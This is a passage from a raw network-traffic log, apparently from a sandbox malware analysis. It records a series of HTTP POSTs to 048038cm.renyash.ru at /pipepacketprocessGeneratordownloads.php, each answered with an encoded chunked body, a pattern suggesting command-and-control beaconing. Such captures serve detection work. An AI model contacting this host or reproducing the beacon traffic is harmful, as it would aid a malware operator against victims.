                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uEWGPaIn%2BjMdjrhTQ147pMzURuL0ETFfEbfJp26EETvTYzSArSo%2BZUAMy2YzuCQe5hmhWr0cAlvI5gwi80LbTobd0mH1j7KA1APzlig1y92RKe5VLeGsGk7msJrMQSkBO%2BQa01fc"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a64ae5942cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=34313&min_rtt=1677&rtt_var=31163&sent=504&recv=607&lost=0&retrans=2&sent_bytes=73480&recv_bytes=397140&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0a 28 24 31 07 20 02 34 1e 33 02 3a 5c 3d 03 3e 02 3d 30 33 43 2b 2b 2b 57 32 28 27 03 3f 3b 3e 44 24 3f 31 0c 22 5b 27 0a 2b 10 21 46 04 1e 22 00 20 10 3f 01 3e 1d 35 55 3e 05 33 07 22 0e 32 04 24 2a 25 53 25 16 2f 55 20 3f 3f 13 27 2f 27 1b 2c 1a 3e 19 2d 20 31 56 26 3e 2c 5e 0e 12 39 1b 32 1e 31 59 2b 28 36 02 27 20 37 57 27 3b 22 01 26 2b 28 09 21 3b 31 5c 28 1e 11 54 30 59 3c 53 3a 15 09 5f 26 3a 30 1d 3d 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 ($1 43:\=>=03C+++W2('?;>D$?1"['+!F" ?>5U>3"2$*%S%/U ??'/',>- 1V&>,^921Y+(6' 7W';"&+(!;1\(T0Y<S:_&:0=!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:40.958429098 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2088
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:41.290894032 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:41.821193933 CET968INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:41 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hi%2B3EgTiK7ra8z76mHKaotCdXs3DIey00HyMnlOZznzv7MSvURKaTu7Z5UMMcVFqvrTdNMYe1Sgi%2BmKxHnMblj2EDoCZeKnoXUFc3QL%2FAgrMlUHat7XnX%2BA1P1TNEcpgPNJ7njf1"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a6a1c0242cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=29627&min_rtt=1677&rtt_var=24645&sent=510&recv=612&lost=0&retrans=2&sent_bytes=74471&recv_bytes=399534&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 54 2b 1a 31 00 23 3b 0a 52 24 2c 32 1b 29 3d 3e 04 2a 23 2b 08 3e 3b 2b 55 27 38 02 10 2b 3b 2a 09 24 01 3a 54 35 3d 23 0a 3f 3a 21 46 04 1e 21 10 37 10 06 59 3d 0d 2e 0a 2b 3c 33 06 22 56 2a 04 33 39 21 1b 32 01 24 0c 21 2c 2b 55 25 3c 0d 1b 2d 27 31 04 2e 20 0b 53 32 14 2c 5e 0e 12 39 51 26 20 1c 03 28 3b 26 02 24 30 3b 55 26 5d 3d 5c 30 02 33 13 23 2b 39 5e 3f 0e 20 0d 24 01 06 1e 3a 02 27 5d 27 17 0e 1d 2b 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#T+1#;R$,2)=>*#+>;+U'8+;*$:T5=#?:!F!7Y=.+<3"V*39!2$!,+U%<-'1. S2,^9Q& (;&$0;U&]=\03#+9^? $:']'+"!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:41.822612047 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:42.154839993 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:42.678544998 CET966INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:42 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=32K8F6FtHW0eeQzdAGJ25p19FTHvBgGgBmUGtOqxrpZOyqjmxoUpBbWJ9LK363%2FzvaYGmlf6nQA18B6Prld4cRiJ6XCDm0KD5%2FXz2qY%2F92E7WJNBMok1RMuM4BDPCUmwUpqYMgrS"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a6f79a542cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=26141&min_rtt=1677&rtt_var=18570&sent=516&recv=617&lost=0&retrans=2&sent_bytes=75464&recv_bytes=401940&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 53 3f 1a 0f 01 20 3b 2c 1f 30 05 31 00 3d 04 25 13 29 0e 2f 0a 3e 2b 27 1f 25 3b 27 01 2b 06 26 45 27 59 2a 55 21 3d 23 0b 2b 2a 21 46 04 1e 22 02 34 2e 2c 59 2a 0d 03 52 2a 05 3c 5e 21 20 13 14 33 3a 0f 1b 32 3b 30 0a 22 05 3b 54 24 5a 2f 19 38 24 03 07 2d 30 04 0b 32 3e 2c 5e 0e 12 3a 0e 24 33 29 1f 3f 5e 3a 01 27 0e 15 56 32 28 25 5b 33 2b 3b 55 34 06 3e 05 3c 20 33 57 24 59 27 0e 2e 15 34 04 27 00 3c 51 29 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#S? ;,01=%)/>+'%;'+&E'Y*U!=#+*!F"4.,Y*R*<^! 3:2;0";T$Z/8$-02>,^:$3)?^:'V2(%[3+;U4>< 3W$Y'.4'<Q)!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:42.679354906 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:43.012837887 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:43.545752048 CET962INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:43 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dSlqlFrRpFYFy2x3x3TQ0ygBa3aCoGQZeTR2bc1I7bcPlWghxD7W6NGErnp51OjAUyZ1DvcKJvumm2txTl6R8zXHGjo4K9pNO%2FhUP3GjY3jpbVbVXFP2UYkbslDILRozpkhUi25M"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a74def342cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=21701&min_rtt=1677&rtt_var=16852&sent=522&recv=622&lost=0&retrans=2&sent_bytes=76455&recv_bytes=404346&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 52 28 34 2a 13 23 15 38 57 33 3f 3a 5d 2a 03 3e 05 3d 30 2b 0a 3d 06 23 1c 31 38 33 07 3c 5e 35 1a 27 59 36 57 35 03 3b 0e 28 2a 21 46 04 1e 21 58 23 3d 37 07 29 20 36 0f 3e 2c 05 03 21 23 39 1a 26 39 31 14 25 2b 27 1f 22 3f 23 1e 33 3c 09 53 2d 24 2e 17 2f 30 25 54 25 14 2c 5e 0e 12 39 52 31 0e 1c 04 28 38 3a 01 33 33 20 0e 32 02 39 5d 33 38 30 08 21 38 25 58 3c 20 11 1d 27 3f 2c 52 2e 2b 3f 58 27 29 30 50 2a 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#R(4*#8W3?:]*>=0+=#183<^5'Y6W5;(*!F!X#=7) 6>,!#9&91%+'"?#3<S-$./0%T%,^9R1(8:33 29]380!8%X< '?,R.+?X')0P*!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:43.552705050 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:44.132551908 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:44.266786098 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:44.435580015 CET970INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:44 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FqXQMyc0Kj2fGyXrIUA8IsP869dnSow0khQC%2BtsscOHRJHtlzkpizp%2FXPRDWypCNUSeb%2B3LtdTEg7TDUDboq3WL9ZMd%2BtiBRXURfJedIlkWAMpmHE3041srM0%2BAx4n98oZLPE3H3"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a7a4c8442cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=18677&min_rtt=1677&rtt_var=13792&sent=528&recv=627&lost=0&retrans=2&sent_bytes=77442&recv_bytes=406752&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0f 2b 24 2e 13 21 38 28 11 27 02 26 5e 3e 2e 3d 1e 3e 33 33 09 2a 3b 38 0e 25 06 38 10 3f 3b 31 19 24 2f 0f 0d 21 2d 2b 0a 28 2a 21 46 04 1e 21 5c 34 2e 3c 58 29 33 07 56 2a 3c 33 07 36 0e 26 06 30 39 3a 09 27 38 30 0c 20 3f 3f 54 27 12 3f 53 3b 0a 22 5c 2f 20 0c 0c 32 14 2c 5e 0e 12 39 52 26 0e 29 10 3f 16 3a 03 27 23 20 0f 32 05 21 5a 27 3b 27 54 23 2b 2e 05 28 56 3b 54 24 3c 3b 0f 2d 2b 28 01 24 29 06 1d 2a 08 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 +$.!8('&^>.=>33*;8%8?;1$/!-+(*!F!\4.<X)3V*<36&09:'80 ??T'?S;"\/ 2,^9R&)?:'# 2!Z';'T#+.(V;T$<;-+($)*!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:44.440052032 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:44.774708033 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:45.305099010 CET980INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:45 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6lCDT%2BxFemjeOjRKnJetCq4v%2FJgd7IE3tZ4RN8mD4%2BngY%2F5XP%2FXouV9au7Zq%2Fi%2FedgIeChT7syy%2BKEld6zgq8tFZNzy%2BR4M5tZSb%2BYOb7KA8W0H9mhjX2HskoxEUTNYKt1a5EjIf"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a7fdb1742cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=16832&min_rtt=1677&rtt_var=10698&sent=534&recv=632&lost=0&retrans=2&sent_bytes=78437&recv_bytes=409158&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 53 28 1d 29 01 20 15 0a 52 27 5a 3a 5c 2a 2d 29 5c 3e 09 2f 41 2a 38 33 56 26 38 0a 59 28 5e 2e 09 33 01 0f 0f 22 3d 3b 0d 3f 00 21 46 04 1e 21 5b 23 3e 24 1d 28 33 08 0f 3e 02 01 03 21 23 26 05 33 2a 3a 08 25 38 09 53 35 2f 3f 50 24 05 20 0b 2d 37 2a 5a 3a 0e 3d 55 25 14 2c 5e 0e 12 39 57 31 0e 3a 02 28 2b 25 59 30 30 19 57 32 05 32 01 33 3b 01 55 34 38 21 15 28 0e 15 52 30 59 2b 0a 2d 38 20 00 24 07 01 0f 3e 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#S() R'Z:\*-)\>/A*83V&8Y(^.3"=;?!F![#>$(3>!#&3*:%8S5/?P$ -7*Z:=U%,^9W1:(+%Y00W223;U48!(R0Y+-8 $>!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:45.305903912 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:45.638315916 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:46.129183054 CET973INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:45 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FpAALBm%2BNs6uh2qS%2BkOQ74XBho3RoESgP%2BuyxJ%2FlQjWFQvuSQkDVGSPgfFlM45S%2BbYx2TrqJYzZC2acBd%2FiSSfJ%2B75cGXNi7DDBXSVEweeayPC7wBZ2yBteWdcF6Nq5uj5F1ohyt"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a8539cc42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=14539&min_rtt=1677&rtt_var=8948&sent=539&recv=637&lost=0&retrans=2&sent_bytes=79442&recv_bytes=411564&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0f 28 1a 2a 13 34 3b 2b 0a 30 5a 3e 59 29 2e 29 5c 2a 33 2c 1a 29 16 20 0f 32 2b 38 5a 28 06 21 1b 25 3f 26 50 36 03 38 52 2a 3a 21 46 04 1e 21 5c 23 3e 2c 5b 3d 33 21 1f 29 02 20 5b 35 30 39 59 24 14 0b 1b 32 28 3c 0b 36 02 28 0f 25 3f 2c 08 3b 1a 22 19 2d 20 04 0f 25 2e 2c 5e 0e 12 39 15 32 09 3a 05 3f 06 17 12 27 20 27 56 31 05 31 12 30 02 33 1e 21 38 39 5c 2b 0e 19 10 30 59 20 57 2d 3b 37 59 30 17 24 13 3e 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 (*4;+0Z>Y).)\*3,) 2+8Z(!%?&P68R*:!F!\#>,[=3!) [509Y$2(<6(%?,;"- %.,^92:?' 'V1103!89\+0Y W-;7Y0$>"!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:46.131026983 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:46.586424112 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:47.014005899 CET973INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:46 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=juFkv1wzaebItGXEMTTLA9BmBoEFnWoXBR%2F0EdD%2FdMtqxTF8MLc%2B0IZTzNd3vwpsmTisq%2B%2F6sTxUAAnG80PwZM9FryHqOZChvvnrFz%2BFFGcbK2Ermja505x5gH%2Bf22TnEUMySiUo"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a8a7ffe42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=13232&min_rtt=1677&rtt_var=7360&sent=544&recv=642&lost=0&retrans=2&sent_bytes=80440&recv_bytes=413970&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 10 3f 1d 29 06 20 02 30 57 30 05 3a 59 2b 3d 22 01 2a 0e 3c 1d 3e 38 3f 12 31 3b 3c 12 2b 01 36 43 27 06 26 56 21 3d 2f 0b 3c 10 21 46 04 1e 21 5c 23 58 34 5a 29 23 26 0f 3e 3c 27 05 35 30 3d 59 27 14 31 57 25 38 2f 55 22 05 30 0d 30 2f 3c 0f 38 34 2e 5f 3a 23 31 53 26 2e 2c 5e 0e 12 3a 0a 26 30 2a 05 28 06 21 5c 24 0e 30 0d 31 05 0f 5a 33 05 23 55 23 5e 32 01 3c 20 24 0b 27 3f 0e 56 2d 05 23 5e 30 17 2c 50 2a 32 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#?) 0W0:Y+="*<>8?1;<+6C'&V!=/<!F!\#X4Z)#&><'50=Y'1W%8/U"00/<84._:#1S&.,^:&0*(!\$01Z3#U#^2< $'?V-#^0,P*2!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:47.014933109 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2076
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:47.348870993 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:47.875616074 CET967INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:47 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SB%2BurdR8r4mKN6EMzulL75Oyldq8eXT2gKVuzxma8QAMDTmLcy9uleSG87PoyqaiPGMzFR1zlaJsi6h2v1%2BTaI%2B5GeDwfksv8CcWNrAjICN07RQxiwEDLI%2FlOTNJ5nnjCECJyrO1"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a8fee3542cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12792&min_rtt=1677&rtt_var=7603&sent=550&recv=647&lost=0&retrans=2&sent_bytes=81438&recv_bytes=416352&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 56 2a 34 0f 07 37 05 2c 1e 24 12 03 06 3d 3d 3a 04 3d 33 37 40 29 16 15 1d 25 16 20 5f 28 5e 35 1d 33 59 32 1d 36 04 30 53 3f 3a 21 46 04 1e 22 04 34 2e 24 12 28 23 0f 52 29 02 0a 5b 21 56 35 5d 27 29 26 0e 25 16 2f 1e 22 12 2c 0f 27 3f 2c 0a 2c 27 2d 07 2f 23 21 10 31 04 2c 5e 0e 12 39 1a 26 56 39 59 3c 28 3a 04 33 20 38 0c 26 2b 0b 5b 33 3b 3b 57 23 5e 25 58 3f 09 34 0e 27 2c 37 0e 2e 15 37 15 26 39 28 13 3d 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#V*47,$==:=37@)% _(^53Y260S?:!F"4.$(#R)[!V5]')&%/",'?,,'-/#!1,^9&V9Y<(:3 8&+[3;;W#^%X?4',7.7&9(="!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:47.876610041 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:48.209214926 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:48.741763115 CET965INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:48 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HB7mtA5rIZNES7sC8fNpior%2Fqe2iTEDA3F3sHfBDyqylBLAo9FS1OluV2ca7GxSc7hbknWUI3TduN3jzwb8VVrAgaU%2BJXJF7l9RtcJDssbn2u80tXMUeXRB8iqcxhhqKDrwUr%2Bf0"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a954d4e42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12342&min_rtt=1677&rtt_var=7631&sent=556&recv=652&lost=0&retrans=2&sent_bytes=82430&recv_bytes=418758&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0f 28 24 32 12 20 05 2c 11 24 3f 3e 59 3d 13 2e 02 2a 20 01 45 3d 16 33 50 25 16 02 5e 28 5e 32 40 33 3f 32 51 35 2d 23 0d 28 10 21 46 04 1e 21 13 21 3d 30 5e 28 33 08 0f 3d 02 2c 16 35 56 3d 1a 27 3a 29 14 31 38 23 55 36 3c 33 13 24 12 3f 1b 2c 34 2a 5f 2d 33 39 55 26 3e 2c 5e 0e 12 3a 08 31 33 2a 01 28 5e 22 05 27 30 34 08 25 3b 32 03 30 05 3b 1e 20 28 21 14 2b 23 20 0b 24 2f 38 56 2d 15 05 5e 27 00 30 1c 3d 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 ($2 ,$?>Y=.* E=3P%^(^2@3?2Q5-#(!F!!=0^(3=,5V=':)18#U6<3$?,4*_-39U&>,^:13*(^"'04%;20; (!+# $/8V-^'0=!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:48.744401932 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:49.079763889 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:49.606992960 CET967INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:49 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mys86hID%2BP%2FqM416yCsgZxxzAoIjie7xb0qJ8SVwa%2FJJLrmkJXw2uTQBASI6p51nGuCL8rwN3cxBwheaGDih9VCSCpIEve9rAmMzhOinaFfw6uND0WxzPBhWdND%2BqdT88xQUFZ93"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a9abaf242cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12579&min_rtt=1677&rtt_var=8893&sent=562&recv=657&lost=0&retrans=2&sent_bytes=83420&recv_bytes=421164&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0b 3c 1a 08 13 37 3b 23 0d 27 12 00 1b 2a 2d 07 13 29 33 37 0a 29 5e 3f 50 26 16 20 5b 3f 5e 22 40 24 06 36 13 21 04 24 57 2b 10 21 46 04 1e 21 5a 23 10 02 12 3e 0d 22 0b 29 3f 33 04 35 30 29 1a 30 03 25 51 31 5e 23 53 35 05 3f 50 33 05 33 56 2c 24 2e 17 39 09 31 54 31 2e 2c 5e 0e 12 39 50 26 1e 21 10 3f 06 32 02 27 09 24 0f 27 3b 26 00 27 05 0d 50 37 06 25 14 29 23 24 0d 27 2f 09 0e 2d 05 2f 5d 30 17 0e 50 2a 32 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 <7;#'*-)37)^?P& [?^"@$6!$W+!F!Z#>")?350)0%Q1^#S5?P33V,$.91T1.,^9P&!?2'$';&'P7%)#$'/-/]0P*2!^/,Q4TV0
